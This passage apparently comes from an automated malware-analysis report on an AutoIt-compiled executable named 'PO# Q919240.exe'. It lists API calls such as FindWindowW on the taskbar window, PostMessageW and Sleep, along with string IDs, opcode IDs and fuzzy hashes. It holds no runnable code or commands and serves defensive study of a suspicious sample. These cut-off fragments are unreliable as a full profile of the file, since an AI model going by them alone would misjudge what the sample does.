                  • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                Strings
                Similarity
                • API ID: CloseHandleInternet$ObjectSingleWait
                • String ID: aeB
                • API String ID: 857135153-906807131
                • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                APIs
                Strings
                Similarity
                • API ID: _wcsncpy
                • String ID: ^B$C:\Users\user\Desktop\PO# Q919240.exe
                • API String ID: 1735881322-2750826344
                • Opcode ID: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                • Instruction ID: 95fca152a805ab331260cabc3645652019b64b11bc5d0d7a1f408bc65d2df1f2
                • Opcode Fuzzy Hash: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                • Instruction Fuzzy Hash: ADE0C23360051A7B9710DE4AD841DBBF37DEEC4A20B08802AF90883200E2B1BD1A43E4
                APIs
                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                • PostMessageW.USER32(00000000), ref: 00441C05
                  • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                Strings
                Similarity
                • API ID: FindMessagePostSleepWindow
                • String ID: Shell_TrayWnd
                • API String ID: 529655941-2988720461
                • Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                • Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
                • Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                • Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
                APIs
                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                  • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                Strings
                Similarity
                • API ID: FindMessagePostSleepWindow
                • String ID: Shell_TrayWnd
                • API String ID: 529655941-2988720461
                • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                APIs
                • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                  • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                Strings
                Similarity
                • API ID: Message_doexit
                • String ID: AutoIt$Error allocating memory.
                • API String ID: 1993061046-4017498283
                • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D